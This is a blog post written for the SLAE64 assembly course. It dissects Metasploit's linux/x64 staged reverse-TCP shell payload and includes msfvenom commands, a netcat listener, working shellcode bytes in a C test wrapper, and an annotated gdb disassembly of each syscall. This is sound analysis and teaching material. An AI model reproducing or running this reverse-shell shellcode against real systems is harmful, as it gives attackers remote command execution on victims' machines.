linux/x64/shell/reverse_tcp staged shellcode generally consists of following steps
- Map 4096 bytes in process’ VAS memory
- Create and connect socket to remote address and port
- Wait for incoming data and save them into mapped memory
- Execute saved data
Shellcode demonstration
Create elf64 executable with msfvenom
$ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555 -o staged_reverse_tcp
Set up nc listener with named pipe used as binary data transfer channel and run it in background. <> operator is read/write redirection.
$ mkfifo /tmp/fifo $ nc -l 127.1.1.2 5555 <> /tmp/fifo &
Run the reverse shell stager which connects to nc listener
$ ./staged_reverse_tcp
Send execve /bin/sh shellcode back to the stager via named pipe
$ echo -ne "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" > /tmp/fifo
The shellcode gets executed in the stager
$ ./staged_reverse_tcp $ id uid=1000(maple)...
Shellcode overview
Let’s generate the staged shellcode with msfvenom and output it in C format
$ msfvenom -p linux/x64/shell/reverse_tcp -f c -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555
and insert it into C testing wrapper
// shellcode.c
// shellcode testing wrapper
#include<stdio.h>
#include<string.h>
// msfvenom -p linux/x64/shell/reverse_tcp -f c -a x64 --platform linux LHOST=127.1.1.2 LPORT=5555
unsigned char code[] = \
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x52\x6a\x0a"
"\x41\x59\x56\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f"
"\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x15\xb3\x7f"
"\x01\x01\x02\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
"\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58"
"\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f"
"\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x5a"
"\x0f\x05\x48\x85\xc0\x78\xef\xff\xe6";
main()
{
printf("Shellcode Length: %zd\n", strlen(code));
int (*CodeFun)() = (int(*)())code;
CodeFun();
}
Compile it without buffer overflow stack protection and allow executable stack with -z flag which is passed to the linker
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
Now let’s disassemble the shellcode using gdb
$ gdb -q shellcode (gdb) break *&code (gdb) r (gdb) disas => 0x0000000000601040 <+0>: xor rdi,rdi 0x0000000000601043 <+3>: push 0x9 0x0000000000601045 <+5>: pop rax 0x0000000000601046 <+6>: cdq 0x0000000000601047 <+7>: mov dh,0x10 0x0000000000601049 <+9>: mov rsi,rdx 0x000000000060104c <+12>: xor r9,r9 0x000000000060104f <+15>: push 0x22 0x0000000000601051 <+17>: pop r10 0x0000000000601053 <+19>: mov dl,0x7 0x0000000000601055 <+21>: syscall 0x0000000000601057 <+23>: test rax,rax 0x000000000060105a <+26>: js 0x6010ae 0x000000000060105c <+28>: push 0xa 0x000000000060105e <+30>: pop r9 0x0000000000601060 <+32>: push rsi 0x0000000000601061 <+33>: push rax 0x0000000000601062 <+34>: push 0x29 0x0000000000601064 <+36>: pop rax 0x0000000000601065 <+37>: cdq 0x0000000000601066 <+38>: push 0x2 0x0000000000601068 <+40>: pop rdi 0x0000000000601069 <+41>: push 0x1 0x000000000060106b <+43>: pop rsi 0x000000000060106c <+44>: syscall 0x000000000060106e <+46>: test rax,rax 0x0000000000601071 <+49>: js 0x6010ae 0x0000000000601073 <+51>: xchg rdi,rax 0x0000000000601075 <+53>: movabs rcx,0x201017fb3150002 0x000000000060107f <+63>: push rcx 0x0000000000601080 <+64>: mov rsi,rsp 0x0000000000601083 <+67>: push 0x10 0x0000000000601085 <+69>: pop rdx 0x0000000000601086 <+70>: push 0x2a 0x0000000000601088 <+72>: pop rax 0x0000000000601089 <+73>: syscall 0x000000000060108b <+75>: pop rcx 0x000000000060108c <+76>: test rax,rax 0x000000000060108f <+79>: jns 0x6010b6 0x0000000000601091 <+81>: dec r9 0x0000000000601094 <+84>: je 0x6010ae 0x0000000000601096 <+86>: push rdi 0x0000000000601097 <+87>: push 0x23 0x0000000000601099 <+89>: pop rax 0x000000000060109a <+90>: push 0x0 0x000000000060109c <+92>: push 0x5 0x000000000060109e <+94>: mov rdi,rsp 0x00000000006010a1 <+97>: xor rsi,rsi 0x00000000006010a4 <+100>: syscall 0x00000000006010a6 <+102>: pop rcx 0x00000000006010a7 <+103>: pop rcx 0x00000000006010a8 <+104>: pop rdi 0x00000000006010a9 <+105>: test rax,rax 0x00000000006010ac <+108>: jns 0x601075 0x00000000006010ae <+110>: push 0x3c 0x00000000006010b0 <+112>: pop rax 0x00000000006010b1 <+113>: push 0x1 0x00000000006010b3 <+115>: pop rdi 0x00000000006010b4 <+116>: syscall 0x00000000006010b6 <+118>: pop rsi 0x00000000006010b7 <+119>: pop rdx 0x00000000006010b8 <+120>: syscall 0x00000000006010ba <+122>: test rax,rax 0x00000000006010bd <+125>: js 0x6010ae 0x00000000006010bf <+127>: jmp rsi
We have 6 system calls in the shellcode so we analyze them in-depth one by one.
Map 4096 bytes in process’ VAS memory
<+0>: xor rdi, rdi ; RDI = 0 <+3>: push 0x9 <+5>: pop rax ; syscall number 9, void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset) <+6>: cdq ; zeroing RDX via sign extension <+7>: mov dh, 0x10 ; RDX = 0x1000 <+9>: mov rsi, rdx ; RSI = 0x1000, size_t length <+12>: xor r9, r9 ; R9 = 0, off_t offset <+15>: push 0x22 <+17>: pop r10 ; R10 = 0x22(34), int flags <+19>: mov dl, 0x7 ; RDX = 0x1007, int prot <+21>: syscall ; invoke system call mmap(0, 0x1000, 0x1007, 0x22, random_address, 0) ; strace: mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7feaab8ab000 <+23>: test rax, rax ; on success mmap() returns pointer to mapped area, on error -1 and SF flag is set <+26>: js 0x6010ae ; jump to exit() if SF == 1
mmap() system call is invoked which creates new VAS <-> Physical memory mapping. Starting address for new mapping is selected automatically by kernel if NULL is passed in *addr argument. 4096 bytes (1 page) is mapped. prot argument specifies that data in mapped pages can be read, written and executed. flags argument specifies that updates to the mapping are not visible to other processes mapping the same file and that the mapping is not backed by any file; its contents are initialized to zero. fd and offset arguments are ignored due to the MAP_ANONYMOUS flag set.
Return value from mmap() call is tested for the sign and if mmap() returns an error the program jumps to exit() call.
Create and connect socket to remote address and port
<+28>: push 0xa <+30>: pop r9 ; R9 = 0xa(10) <+32>: push rsi ; push 0x1000 <+33>: push rax ; push 0x00007ffff7ff6000, start address of mapped area <+34>: push 0x29 <+36>: pop rax ; syscall number 0x29(41), int socket(int domain, int type, int protocol) <+37>: cdq ; zeroing RDX via sign extension <+38>: push 0x2 <+40>: pop rdi ; RDI = 2 <+41>: push 0x1 <+43>: pop rsi ; RSI = 1 <+44>: syscall ; invoke system call socket(2, 1, 0) ; strace: socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 <+46>: test rax, rax ; on success socket() returns file descriptor, on error -1 and SF flag is set <+49>: js 0x6010ae ; jump to exit() if SF == 1 <+51>: xchg rdi, rax ; load file descriptor to RDI
This assembly stub creates endpoint for communication and returns new file descriptor for the socket. Protocol family which is used for communication is set to PF_INET which stands for IPv4 Internet protocols. type argument specifies communication semantics and is set to SOCK_STREAM which provides sequenced, reliable, two-way, connection-based byte streams. Returned file descriptor is saved into RDI for later use.
As with previous assembly stub this code tests for the return value from socket() call and if negative error value returned the program jumps to the exit() stub.
<+53>: movabs rcx, 0x201017fb3150002 ; struct sockaddr -> sa_family=0x0002, sin_port=0xb315, sin_addr=0x201017f <+63>: push rcx <+64>: mov rsi, rsp ; RSI points to above constructed struct sockaddr <+67>: push 0x10 <+69>: pop rdx ; RDX = 0x10(16), socklen_t addrlen <+70>: push 0x2a <+72>: pop rax ; syscall number 0x2a(42), int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen) <+73>: syscall ; invoke system call connect(fd_num, const struct sockaddr *addr, socklen_t addrlen) ; strace: connect(3, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("127.1.1.2")}, 16) = -1 <+75>: pop rcx ; save sockaddr struct to RCX <+76>: test rax, rax ; on success connect() returns 0 and ZF flag is set, on error -1 and SF flag is set <+79>: jns 0x6010b6 ; connect() was successful, jump to read() <+81>: dec r9 ; decrement R9 loop counter after unsuccessful connection <+84>: je 0x6010ae ; if R9 decremented to 0 then jump to exit() syscall <+86>: push rdi ; save fd_num to stack, popped back to RDI in <+104> <+87>: push 0x23 <+89>: pop rax ; syscall number 0x23(35), int nanosleep(const struct timespec *req, struct timespec *rem); <+90>: push 0x0 <+92>: push 0x5 <+94>: mov rdi, rsp ; RDI points to struct timespec *req, tv_sec = 5, tv_nsec = 0 <+97>: xor rsi, rsi ; RSI = 0, struct timespec *rem = 0 <+100>: syscall ; invoke system call nanosleep(const struct timespec *req, struct timespec *rem) <+102>: pop rcx ; RCX = 5 <+103>: pop rcx ; RCX = 0 <+104>: pop rdi ; RDI = 7 (fd_num) <+105>: test rax, rax ; test nanosleep() result <+108>: jns 0x601075 ; if nanosleep() successful then jump back to connect() syscall stub, if error continue to exit()
Above connect() implementation is slightly more complicated because it implements connection retry mechanism.
The code tries to connect to provided IP and port and if error is returned the R9 register is decremented by one and program executes nanosleep() syscall which pauses program for 5 seconds. connect() call is repeated after each successful nanosleep() execution. R9 is set to 10 so there are 10 connection trials.
If connection succeeds the program jumps to read() stub.
Wait for incoming data and save them into mapped memory
<+118>: pop rsi ; RSI points to mmaped memory, void *buf argument in read() syscall <+119>: pop rdx ; RDX = 0x1000(4096), size_t count in read() syscall <+120>: syscall ; invoke system call read(int fd, void *buf, size_t count); RAX is set to 0 from connect() call <+122>: test rax, rax <+125>: js 0x6010ae ; on error jump to exit()
read() call reads 4096 bytes from the socket and saves them to previously mapped memory.
Execute saved data
<+127>: jmp rsi ; execute read bytes
Load RIP with RSI content which points to read data thus effectively execute them.
Gracefully exit program
<+110>: push 0x3c <+112>: pop rax ; syscall number 60, void exit(int status) <+113>: push 0x1 <+115>: pop rdi ; RDI = 0x1, int status <+116>: syscall ; invoke system call void exit(1)
The linux/x64/shell/reverse_tcp payload has properly implemented graceful exit() mechanism. All of the return values are tested for errors and program flow jumps to the exit() stub if any error returned.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE64 – 1629